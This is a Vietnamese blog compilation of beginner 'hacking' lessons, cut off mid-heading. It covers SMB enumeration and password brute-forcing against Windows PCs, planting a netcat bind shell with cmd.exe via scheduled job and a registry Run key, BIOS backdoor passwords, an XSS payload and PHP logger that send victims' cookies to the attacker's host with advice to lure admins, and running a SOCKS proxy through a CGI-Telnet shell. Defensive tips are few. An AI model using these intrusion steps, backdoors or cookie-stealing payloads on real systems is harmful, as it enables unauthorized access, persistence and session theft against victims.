basiccodien

Màu nền
Font chữ
Font size
Chiều cao dòng

Các kiến thức hacking cơ bản và cổ điển !!! (bài 1)

________________________________________

Có nhiều bạn vào thế giới hacking nhưng vẫn chưa hiểu hack là gì và đôi khi vẫn còn chưa hiểu các cách hack nâng cao của các thế hệ đi trước nay mình sưu tập một số cách hack cơ bản cho các bạn , cũng mong các bạn củng cố được kiến thức của mình

Có nhiều tác giả khác nhau cũng mong các tác giả lượng thứ và chia sẽ kiến thức đến cho mọi người

Bắt đầu :

hack pc không có gì là không thể

Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha). Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn)

Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể.

Vậy hacker làm như thế nào để Hack?

Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion... ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối ...)

Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.

Chỉ bằng vài dòng lệnh đơn giản trên comand line:

CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment

-------------------------------------------------------------------------------

C Disk

PRJA3 Disk

The command completed successfully.

C:\>

Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).

Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.

Cũng bằng command line:

CODE

C:\> net use z: \\x.x.x.x \share

The command completed successfully.

Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password

Lấy Username :

CODE

C:\> Nbtstat -A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

ADMIN <00> UNIQUE Registered

BODY <00> GROUP Registered

ADMIN f <20> UNIQUE Registered

BODY <1E> GROUP Registered

BODY <1D> UNIQUE Registered

..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C

Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY

Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt

CODE

"" ADMIN

123456 ADMIN

123456 BODY

"" BODY

...

Sau đó hacker crack bang lệnh :

[/code]Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:

CODE

C:\> FOR /F %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt x.x.x.x.%I>>output.txt

Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.

nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.

Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )

Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind......) sau đó kết nối tới IPC$ ( mặc định share của windows)

CODE

C:\> net use \\x.x.x.x\IPC$ "password" /user:"administrator"

The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:

CODE

C:\> net use \\x.x.x.x\IPC$ "" /user:""

The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:

giờ thiết lập 1 phiên làm viêc:

CODE

C:\> net use \\x.x.x.x\IPC$ "password" /user:"administrator"

The command completed successfully.

Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)

chép nc vào máy victim

CODE

C:\>copy nc.exe \\x.x.x.x\ADMIN$

c.exe

The command completed successfully.

1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)

CODE

C:\> sc \\x.x.x.x start schedule

service_name : schedule

Bây giờ kiểm tra giờ trên máy victim

CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.

Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive "c:\windows

c.exe" -L -d -p111 -e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe

CODE

C:\>nc -nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open

Microsoft Windows XP [Version 5.1.2600]

© Copyright 1985-2001 Microsoft Corp.

C:\windows>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe')

Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?

Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]

"netcat"="\"C:\

c\

c.exe\" -L -d -p111 -e cmd.exe"

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 2)

Tổng hợp Bypass / Crack BIOS Password

Trước khi bạn cố gắng bypass hay crack BIOS bạn nên liên hệ với nhà sản xuất phần cứng mà bạn đang sử dụng (MainBoard) để nhận được sự hỗ trợ từ họ và đừng quên hỏi họ làm thế nào để bypass BIOS security. Trong một số trường hợp họ không thể giúp bạn, nhưng ở đây là 1 số phương pháp có thể giúp bạn bypass hay reset password của BIOS:

• Backdoor Passwords

• Sử dụng phần mềm Cracking Password BIOS

• Reset password bằng cách dùng jumpers hay solder beads.

• Lấy Pin CMOS ra ngoài ít nhất 10 phút

• Một số cách khác

• Sử dụng những dịch vụ chuyên nghiệp

Backdoor Passwords

Nhiều nhà sản xuất phần cứng đã cung cấp những mật khẩu Backdoor để giúp bạn tuy cập đến BIOS setup trong trường hợp bạn quên mất mật khẩu của mình.

Chú ý: Một vài BIOS đã thiết lập để khoá hệ thống của bạn nếu bạn đánh password sai trên 3 lần. Vì thế bạn nên đọc tài liệu của nhà sản xuất trước khi bắt đầu đánh password.

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award

BIOSTAR CONCAT CONDO Condo d8on djonet HLT

KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX

ZAAADA ZBAAACAZJAAADC01322222 589589 589721 595595

AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward

J64 J256 J262 j332 j322

SYXZ syxz shift + syxz TTPTHA

598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos

LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer

Password

VOBIS & IBM

merlin

Dell

Dell

Biostar

Biostar

Compaq

Compaq

Enox

xo11nE

Epox

central

Freetech

Posterie

IWill

iwill

Jetway

spooml

Packard Bell

bell9

QDI

QDI

Siemens

SKY_FOX

TMC

BIGO

Toshiba

Toshiba

TOSHIBA BIOS

Một số sản phẩm laptop và desktop của Toshiba sẽ cho phép bạn bypass BIOS Password nếu bạn giữ phím Shift trong suốt qúa trình boot.

IBM APTIVA BIOS

Click cả chuột phải và trái liên tục trong suốt quá trình

Nếu tất cả đều không được bạn có thể sử dụng default passords list: :

http://www.phenoelit.de/dpl/dpl.html

Ngoài ra, nếu bạn muốn vô hiệu hóa mật khẩu đã cài trong BIOS (để không ai có thể thay đổi phần cấu hình trong BIOS), bạn có thể gõ lệnh debug sau khi vào được trong DOS: C:\>debug -O 70 2f -O 71 ff -Q

Sử dụng phần mềm Cracking Password BIOS

Dưới đây là 1 số phần mềm dùng để bypass BIOS, chúng có thể được xem là nguy hiểm hoặc là có ích tuỳ theo mức độ. Tuy nhiên tôi khuyên bạn hãy thận trọng khi dùng nó.

• http://www.cgsecurity.org/index.html?cmospwd.html

• http://www.dewassoc.com/support/bios/bios_password.htm

• http://www.majorgeeks.com/download2969.html

Reset password bằng cách dùng jumpers hay solder beads.

Tắt máy tính, gạt jumper tới vị trí tiếp xúc với mảnh kim loại (có thể bạn sẽ phải cầm tay giữ jumper khi đẩy chúng tiếp xúc với mảnh kim loại). Nhấn nguồn để bật máy tính, khi đó hệ thống của bạn sẽ không thể khởi động được theo cách này nhưng CMOS lại bị xoá hết. Tiếp sau đó, bạn đặt đặt jumper về vị trí mặc định và khởi động lại máy tính bình thường. Trong hầu hết trường hợp, máy tính của bạn sẽ dừng ngay tại màn hình POST và yêu cầu bạn nhấn F1 hoặc một từ khoá nào đó để định lại BIOS về dạng mặc định. Để thực hiện được điều này, từ màn hình BIOS, bạn chỉ cần lưu (save) và thoát (exit) để vào máy tính một cách bình thường, khi đó mật khẩu BIOS đã bị xoá bỏ hoàn toàn.

Sau khi đã xóa được RAM CMOS, bạn khởi động máy lại, vào trình Setup để cấu hình lại các thông số đúng cho BIOS. Nếu bạn quên các thông số này, bạn có thể dùng chức năng "Load BIOS default".

Lấy Pin CMOS ra ngoài ít nhất 10 phút

Bằng cách gỡ pin nuôi CMOS ra khỏi mainboard rồi gắn lại. Tuy nhiên tùy theo loại pin mà có thể sẽ phải dùng mỏ hàn và đòi hỏi phải biết về kỷ thuật hàn mạch điện tử.

Một số cách khác

* Bằng cách gỡ chip RAM CMOS ra khỏi mainboard 1 thời gian (để các tụ lọc phóng hết điện) rồi gắn lại nếu chip này được gắn trên một đế.

* Bằng cách chập mạch các transistor và RAM CMOS trên mainboard (cách nầy không nên làm nếu không biết về điện tử).

Sử dụng những dịch vụ chuyên nghiệp

Bằng cách gọi 911 hehe, í mà ở Việt Nam cũng có 911 mà, các bạn có thể vào đây để yêu cầu giúp đỡ nhanh chóng nhớ nhé, đừng có gọi lộn 113 thì toi . Good Luck

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 3)

XSS căn bản

Copyright by HCVTeam.net --- huythanhv2

Ngày nay, trên Internet ko khó để thấy các bug mới về XSS. huythanh thấy ngứa tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này. Vì mới tìm hiểu nên bài này hợp với newbie hơn . Ai copy nhớ cái copyright hộ nhá

** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA . Hix nhớ bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may là in ra 1 bản rồi . Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của mask, hix có mấy chỗ mò cả ngày mới ra . Anyway, cho gởi lời cảm ơn đặc biệt đến Mask

Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm

CSS : Cascading Style Sheets

XSS : Cross-Site Scripting

*** Dấu hiệu nhận biết site mắc lỗi :

Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này

Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]

Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác là siêu sao

*** Cách chèn script :

Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã

Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được )

Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá

CODE

javascript:alert(document.cookie)

Thấy gì nào ? Nó sẽ ra có dạng thế này

CODE

acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;}; session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1; pass_hash=c561a5a3859a0df75f76d98ae67bc026

[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]

Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie

Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong

CODE

javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)

Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất.

Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit.

*** Cách exploit :

Đầu tiên tạo file cookie.php thế này up lên host của bạn

CODE

<?

/*XSS Exploit */

/*PHP Cookie Saver */

/*Copyright by huythanhv2, HCVTEAM.NET */

$f=fopen("xss.txt","a");

$cook=$HTTP_GET_VARS["cookie"];

fputs($f,$cook.chr(13));

fclose($f);

header("location: http://DIACHIDEDUDO.DUDO");

?>

XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này

CODE

http://sitexss.com/index.php?act=[xss]

Chúng ta khai thác thế này

CODE

http://sitexss.com/index.php?act=<script>location="http://hostcuaban.com/cookie.php?cookie="+(document.cookie)

</script>

Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn

Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi )

*** Vài lưu ý :

Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ :

1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS 10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà )

2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn

3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade nó lên location

THE END ---- COPYRIGHT BY HCVTEAM.NET ---- YIM : huythanhv2

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 3)

Các lệnh sử dụng hoặc xâm nhập OS Linux

_ Lệnh " man" : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới

lệnh nay :

Cấu trúc lệnh : $ man .

Ví dụ : $ man man

_ Lệnh " uname ": cho ta biết các thông tin cơ bản về hệ thống

Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .

Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống

Ví dụ : $ps axuw

_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .

Ví du : $ cd /usr/bin ----> nó sẽ đưa bạn đến thư mục bin

_ Lệnh mkdir : tạo 1 thư mục .

Ví dụ : $ mkdir /home/convit ---> nó sẽ tạo 1 thư mục convit trong /home

_ Lệnh rmdir : gỡ bỏ thư mục

Ví dụ : $ rmdir /home/conga ----> nó sẽ gỡ bỏ thư mục conga trong /home .

_ Lệnh ls: liệt kê nội dung thư mục

Ví dụ : $ls -laR /

_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .

Ví dụ : $printf %s "\x41\x41\x41\x41"

_ Lệnh pwd: đưa ra thư mục hiện hành

Ví dụ : $pwd ------> nó sẽ cho ta biết vị trí hiện thời của ta ở đâu :

/home/level1

_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file

Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----->nó sẽ del file blah .

Làm tương tự đối với các lệnh cp , mv .

_ Lệnh find : tìm kiếm file, thư mục

Ví dụ : $find / -user level2

_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep "something"

Vidu : $ps axuw | grep "level1"

_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm

các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm

thấy cả password nữa

VD: $strings /usr/bin/level1

_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để

theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị

lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace

.

Ví dụ : $strace /usr/bin/level1

_ Lệnh" cat, more ": in nội dung file ra màn hình

$cat /etc/passwd | more --> nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .

$more /etc/passwd ----> Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ

liệu nhập vào .

Ví dụ : $echo AAAA | hexdump

_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .

Ví dụ : $gcc -o -g bof bof.c

Ví dụ : $make bof

Ví dụ : $gdb level1

(gdb) break main

(gdb) run

_ Lệnh perl: một ngôn ngữ

Ví dụ : $perl -e 'print "A"x1024' | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh

vào 1024 kí tự )

_ Lệnh "bash" : đã đến lúc tự động hoá các tác vụ của bạn bằng shell

script, cực mạnh và linh hoạt .

Bạn muốn tìm hiểu về bash , xem nó như thế nào :

$man bash

_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .

Ví Dụ : $ ls /home ----> sẽ hiện toàn bộ file trong thư mục Home

$ ls -a -----> hiện toàn bộ file , bao gồm cả file ẩn

$ ls -l -----> đưa ra thông tin về các file

_ Lệnh ghi dữ liệu đầu ra vào 1 file :

Vídụ : $ ls /urs/bin > ~/convoi ------> ghi dữ liệu hiển thị thông tin của thư mục

bin vào 1 file convoi .

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 5)

Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống

có tên là convit thì sẽ có 1 thư mục là /home/convit )

_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls chẳng hạn .

_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng bởi người sử

dụng đặc biệt và dùng quản trị hệ thống .

_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .

_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là

nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )

_ /var : Các file quản trị

_ /usr/lib : Các thư viện chuẩn như libc.a

_ /usr/src : Vị trí nguồn của các chương trình .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :

AIX 3 /etc/security/passwd !/tcb/auth/files//

A/UX 3.0s /tcb/files/auth/?/*

BSD4.3-Ren /etc/master.passwd *

ConvexOS 10 /etc/shadpw *

ConvexOS 11 /etc/shadow *

DG/UX /etc/tcb/aa/user/ *

EP/IX /etc/shadow x

HP-UX /.secure/etc/passwd *

IRIX 5 /etc/shadow x

Linux 1.1 /etc/shadow *

OSF/1 /etc/passwd[.dir|.pag] *

SCO Unix #.2.x /tcb/auth/files//

SunOS4.1+c2 /etc/security/passwd.adjunct ##username

SunOS 5.0 /etc/shadow

System V Release 4.0 /etc/shadow x

System V Release 4.2 /etc/security/* database

Ultrix 4 /etc/auth[.dir|.pag] *

UNICOS /etc/udb *

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 6)

Sử Dụng CGI-Telnet

Trong bài này thangveo sẽ giúp các bạn từ làm cho mình 1 con sock để sử dụng cho riêng bản thân mình.

Đầu tiên muốn làm đựoc bạn cần một host hỗ trợ Perl để chạy cgi-telnet.pl..Ok khi đã có file cgi-telnet trên host rồi thì down cái này về và up thư mục src ngang với cgi-telnet.pl

http://kamiyahomero.net/src.rar

Bắt đầu login Cgi-telnet

Dùng lệnh đầu tiên:

cd sock

Host thangveo sẽ ra thế này ,mỗi host sẽ khác nhau nhưng ko sao.

[email protected] /home/www/duoxau.madpage.com]$

Lệnh tiếp theo chạy là

wget http://optusnet.dl.sourceforge.net/s...s-0.0.2.tar.gz -O mocks.tar.gz

Sẽ hiện ra 1 table gần giống cái này

-11:01:10-- http://optusnet.dl.sourceforge.net/s...s-0.0.2.tar.gz

=> 'mocks.tar.gz'

Resolving optusnet.dl.sourceforge.net... 211.29.132.142

Connecting to optusnet.dl.sourceforge.net[211.29.132.142]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 43,840 [application/x-gzip]

0K .......... .......... .......... .......... .. 100% 42.78 KB/s

11:01:11 (42.78 KB/s) - 'mocks.tar.gz' saved [43840/43840

Bước 3 chạy lệnh sau

s | grep mocks

Nó sẽ ra như sau

f===mocks.conf

mocks.tar.gz

[[email protected] /home/www/duoxau.madpage.com]

Okie đến đây là ok rồi,tiếp nhé ,chạy tiếp lệnh này

tar xzvf mocks.tar.gz

Sẽ ra một loạt như sau

mocks-0.0.2/

mocks-0.0.2/src/

mocks-0.0.2/src/child.c

mocks-0.0.2/src/child.h

mocks-0.0.2/src/error.c

mocks-0.0.2/src/error.h

mocks-0.0.2/src/misc.c

mocks-0.0.2/src/misc.h

mocks-0.0.2/src/socksd.c

mocks-0.0.2/src/socksd.h

mocks-0.0.2/src/up_proxy.c

mocks-0.0.2/src/up_proxy.h

mocks-0.0.2/COPYING

mocks-0.0.2/mocks

mocks-0.0.2/mocks.conf

mocks-0.0.2/README

mocks-0.0.2/TODO

mocks-0.0.2/build

mocks-0.0.2/CHANGELOG

Tiếp đánh lệnh và run

cd mocks-0.0.2

Nó sẽ ra thế này

CHANGELOG

COPYING

README

TODO

build

mocks

mocks.conf

src:

child.c

child.h

error.c

error.h

misc.c

misc.h

socksd.c

socksd.h

up_proxy.c

Chạy tiếp

rm -rf mocks

Nó sẽ ra sau

[[email protected] /home/www/duoxau.madpage.com/mocks-0.0.2

Chạy lần lượt theo thứ tự các lênh này tiếp theo

1ls build CHANGELOG COPYING mocks.conf README src TODO

2 ./build

3 ls build CHANGELOG COPYING mocks mocks.conf README src TODO

Cuối cùng chạy lênh sau

./mocks start

Từ nay port mặc định của sock đó sẽ là 10080 và ip là ip của host,.Finished

Thangveojp.

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 7)

tắt máy từ xa trong mạng Lan

chỉ cần Bạn là administrator hoặc nằm trong Group administrators thôi, nhưng tốt hết thì Bạn nên xài tài khoảng administrator

bắt đầu với Start/run/cmd ~~~> Enter

Trong màn hình DOS gõ shutdown -i ~~> Cửa sổ remote Shutdown Dialog hiện lên phải không

Click Add chọn tên máy/IP cần Shutdown ( có thể gõ 1 loạt tên máy/IP để shutdown nhiều máy) sau đó chọn Shutdown/Retart/logoff (tùy bạn) rồi chọn Hardware:Maintenamce (Planned) rồi click OK.

Note :

Theo mặc định trong WinXP thì Groups Administrators sẽ có quyền Shutdown/Retart/logoff các máy từ xa, nhưng bạn cũng có thể cấp quyền này cho 1 số Groups khác.

Để thấy rõ hơn bạn vào Local Security Settings bằng cách vào Control Panet chọn Administrative Tool/Local Security Policy/Local Policies/User Rights Assignment :

nhìn bên phải màn hình tìm Force shutdown from a remote system thì Bạn thấy là administrators <~~~ Đây là nhóm có quyền shutdown hệ thống từ xa, Bạn có thể thêm vào nhóm khác bằng cách Right-Click vào Force shutdown from a remote system và chọn Add User or Group và chọn user hoặc Group nào thì .... tùy Bạn.

Chúc Thành công.

nếu các bạn đã có hứng thú trong hacking rồi thì hãy tìm hiểu tiếp các cách hack khác , hy vọng các bạn thích

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 2)

Tổng quan hacking

Bài học này được chia làm 2 phần chính, với mục đích là giới thiệu cho các bạn hiểu một số cách thức mà hacker sử dụng để thâm nhập vào hệ thống và một số phương pháp có thể áp dụng để tự bảo vệ bạn. Bài học này cũng ko có ý định hướng bạn đến một cái nhìn xấu về hành vi của hacker mà mục đích là giúp bạn hiểu rõ hơn về vấn đề an toàn bảo mật.

Cụ thể như sau:

1- Các hacker đã làm như thế nào, động cơ thúc đẩy họ và các phương pháp thông dụng

2- Một số biện pháp tự bảo vệ, bắt đầu từ việc thiết kế, xây dựng ngôi nhà của bạn đến việc đánh giá, tìm hiểu rõ hơn về các quá trình nhận dạng xâm nhập, tự bảo vệ...

Chúng ta sẽ đi từng bước một. Ở đây tôi sẽ cố gắng tóm lược mà ko đi quá sâu vào chi tiết nhằm tạo bài học sáng sủa dễ hiểu, nếu có ý kiến thắc mắc, các bạn hãy post lên sau mọi người sẽ cùng trao đổi giải quyết.

I. PHÍA HACKERS

1- Mục đích và động cơ của hackers:

- Đạt mục đích gì đó liên quan đến tiền bạc, như thay đổi thông tin về tài khoản trong ngân hàng, chuyển tiền, trộm credit card...

- Giải trí khi rảnh rỗi, thử tay nghề, chứng tỏ khả năng , kiểm tra mức độ bảo mật...

- Làm yếu đi hoặc giảm khả năng chống cự của các hệ thống trên mạng, giúp dễ dàng cho việc xâm nhập khai thác theo mục đích nào khác...

- Tận dụng các tài nguyên trên mạng như đĩa cứng, tốc độ CPU, dung lượng đường truyền mạng...Hacker có thể lợi dụng sơ hở của 1 server để chiếm một vùng ko gian đĩa free trên nó để chứa dữ liệu của mình, hoặc lợi dụng tốc độ CPU và bandwidth của các server (thường rất nhanh) để làm vào việc khác như tính toán..., thậm chí dùng để DoS các server khác...

- ...

Từ những mục đích trên, bạn cần hiểu rõ bản thân hệ thống bạn đang kiểm soát. Có những vấn đề đặt ra như sau:

- Bạn đang nắm giữ và bảo vệ cái gì, mức độ quan trọng của chúng?

- Cách thức nào người ta có thể tìm cách tấn công, trộm thông tin hay thậm chí phá hủy thông tin của bạn?

- Mức độ khó mà hacker sẽ gặp phải, họ thành công đến mức độ nào?

- Mức độ ảnh hưởng nghiêm trọng thế nào nếu hacker thành công?

Việc hiểu rõ và đánh giá đúng chính mình cũng như khả năng của đối phương có thể giúp bạn hạn chế tối đa khả năng bị tấn công. Có một điều bạn phải hiểu nó như một yếu tố khách quan, tất yếu là "Mọi hệ thống phức tạp sớm muộn cũng sẽ gặp rắc rối", vì đơn giản là các hệ thống đó cho bàn tay và trí tuệ con người tạo ra, mà con người thì ko ai hoàn hảo cả. Nếu bạn chú ý sẽ biết trong thời gian vừa qua, các hệ thống được xem vào hàng đại gia trên net đều đã từng được viếng thăm, như Microsoft, Oracle, eBay, NASA, CIA, các cơ quan liên bang USA, các hệ thống ngân hàng lớn trên thế giới...Security liên tục được cải thiện, và bên cạnh đó thì lỗi, lổ hổng cũng ko ngừng đựơc phát hiện.

2- Một số cách thức hacker dùng để xâm nhập

Về cơ bản, để có thể tiến hành thâm nhập vào hệ thống, các hacker thường phải qua những bước sau. Lưu ý các bước tôi trình bày ở đây không bắt buộc phải được thực hiện tuần tự mà tùy vào điều kiện và ngữ cảnh để áp dụng cho thích hợp. Các công cụ trình bày ở đây các bạn cần tìm hiểu cách sử dụng, tôi sẽ không trình bày chi tiết.

a. Xác định mục tiêu - Footprinting

